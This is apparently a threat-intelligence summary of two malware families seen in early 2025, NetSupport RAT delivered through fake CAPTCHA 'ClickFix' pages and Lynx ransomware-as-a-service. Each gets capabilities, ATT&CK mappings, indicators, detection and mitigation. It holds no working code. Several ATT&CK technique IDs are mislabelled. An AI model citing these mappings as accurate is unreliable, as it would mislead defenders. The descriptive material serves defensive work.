Full Report
The first quarter of 2025 has been a battlefield in the world of cybersecurity. Cybercriminals continued launching aggressive new campaigns and refining their attack methods. Below is an overview of five notable malware families, accompanied by analyses conducted in controlled environments. NetSupport RAT Exploiting the ClickFix Technique In early 2025, threat actors began exploiting a technique
Analysis Summary
# Tool/Technique: NetSupport RAT
## Overview
NetSupport RAT is a Remote Access Trojan exploited in early 2025 using the "ClickFix" technique. It allows attackers full remote control over compromised systems, enabling activities such as screen monitoring, file manipulation, and arbitrary command execution.
## Technical Details
- Type: Malware family (Remote Access Trojan - RAT)
- Platform: Windows (Implied by reliance on PowerShell and standard Windows executables)
- Capabilities: Real-time screen control, file management (upload/download/delete), remote command execution, clipboard stealing, keystroke logging, process/service manipulation, persistence mechanisms.
- First Seen: Mentioned in active campaigns in Q1 2025.
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- TA0003 - Persistence
- T1547 - Boot or Logon Autostart Execution
- T1547.001 - Registry Run Keys / Startup Folder
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information
- T1055 - Process Injection
- TA0007 - Credential Access
- T1056 - Input Capture
- T1056.001 - Keylogging
- T1115 - Clipboard Data
- TA0011 - Command and Control
- T1573 - Encrypted Channel
## Functionality
### Core Capabilities
- Real-time remote viewing and control of the victim's screen.
- Ability to remotely run system commands and PowerShell scripts.
- File system manipulation (uploading, downloading, modifying, and deleting files).
- Capturing copied text (clipboard data) and recording keystrokes.
### Advanced Features
- Utilizes process injection and code obfuscation for evasion.
- Establishes stealthy C2 connections using encrypted traffic.
- Implements persistence by installing itself in startup folders, registry keys, or scheduled tasks.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: [Not provided in the context]
- Registry Keys: Mentioned as a mechanism for persistence (modifies registry startup keys).
- Network Indicators: Connects to a Command-and-Control (C2) server using encrypted traffic.
- Behavioral Indicators: Execution of malicious PowerShell commands downloaded via fake CAPTCHA pages (ClickFix technique); execution of scripts via `wscript.exe`; creation of internet connection objects for remote control.
## Associated Threat Actors
- [Not explicitly named for NetSupport RAT, but distributed by "threat actors" exploiting the ClickFix technique.]
## Detection Methods
- Signature-based detection (Expected, but not detailed).
- Behavioral detection: Monitoring for PowerShell execution triggered by web interactions (ClickFix context); monitoring for suspicious system process injection.
- YARA rules: [Not provided in the context]
## Mitigation Strategies
- User training to recognize and avoid interacting with fake CAPTCHA pages or prompts requiring script execution.
- Application whitelisting for PowerShell.
- Strict control over registry auto-start locations.
- Monitoring for process injection activity.
## Related Tools/Techniques
- ClickFix Technique (Delivery mechanism).
- wscript.exe execution.
***
# Tool/Technique: Lynx Ransomware-as-a-Service (RaaS)
## Overview
Lynx Ransomware is a sophisticated Ransomware-as-a-Service (RaaS) operation that evolved from the earlier INC ransomware. It targets diverse industries, provides a user-friendly affiliate panel for deployment, and employs double extortion tactics (data theft followed by encryption), incentivizing affiliates with an 80% ransom share.
## Technical Details
- Type: Malware family (Ransomware, RaaS)
- Platform: Windows (Implied by standard ransomware behaviors like VSC deletion and targeting local/network drives).
- Capabilities: File encryption, data exfiltration (double extortion), VM/sandbox detection, in-memory execution, shadow copy deletion, credential dumping.
- First Seen: Intensified operations in Q1 2025 (January/February 2025 attacks cited).
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter (Implied for initial execution/setup)
- TA0009 - Collection
- T1005 - Data from Local System
- T1003 - OS Credential Dumping (Utilizes credential dumping techniques)
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel (Transfers stolen data over encrypted channels like HTTPS)
- TA0002 - Defense Evasion
- T1496 - Resource Hijacking (Implied by running in memory)
- T1484 - Virtualization Detection
- TA0006 - Credential Access
- T1555 - Credentials from Managed Applications (Targets browsers, Windows Credential Manager)
- TA0004 - Privilege Escalation (Implied by potential VSC manipulation)
## Functionality
### Core Capabilities
- Encrypts all files by default, including local, network, and removable media.
- Data exfiltration prior to encryption is mandatory, publishing data on a leak site if payment fails.
- Disables recovery features by deleting Volume Shadow Copies ($VSC).
- Uses RestartManager to close applications that might block encryption.
### Advanced Features
- Configurable RaaS panel allows affiliates to customize victim profiles, ransomware samples, and data leak schedules.
- Employs DGA-based domains and Tor for anonymized C2 communication.
- Runs primarily in memory, avoiding writing files to disk to evade static analysis.
- Contains specific checks to detect and alter behavior when running inside Virtual Machines or sandboxes.
- Utilizes credential dumping techniques against stored credentials (browsers, Credential Manager).
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: Custom generated samples per affiliate/victim.
- Registry Keys: [Not provided in the context]
- Network Indicators: C2 connections utilize DGA-based domains and anonymized traffic via Tor.
- Behavioral Indicators: Attempts to delete Volume Shadow Copies; launching system processes to close interfering applications; attempts to access browser or Credential Manager data; in-memory execution patterns.
## Associated Threat Actors
- Lynx Ransomware-as-a-Service (RaaS) operators.
- Affiliates utilizing the RaaS infrastructure.
## Detection Methods
- Signature-based detection (Expected for custom samples).
- Behavioral detection: Monitoring for file encryption patterns combined with shadow copy deletion; detection of connections to known DGA or Tor exit nodes associated with C2; monitoring attempts to access credential storage locations.
- YARA rules: [Not provided in the context]
## Mitigation Strategies
- Regular, offline, and tested backups (ensuring VSCs are not the sole recovery method).
- Network segmentation to limit the scope of lateral movement and prevent encryption of network shares.
- Advanced endpoint protection capable of detecting in-memory artifacts and DGA communication.
- Strong credential hygiene and Multi-Factor Authentication (MFA).
## Related Tools/Techniques
- INC Ransomware (Predecessor).
- Ransomware-as-a-Service (RaaS) operational model.
- Double Extortion (Data Theft + Encryption).